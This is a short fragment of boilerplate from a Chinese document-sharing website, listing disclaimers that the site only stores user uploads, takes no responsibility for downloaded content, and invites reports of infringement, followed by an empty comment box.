  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論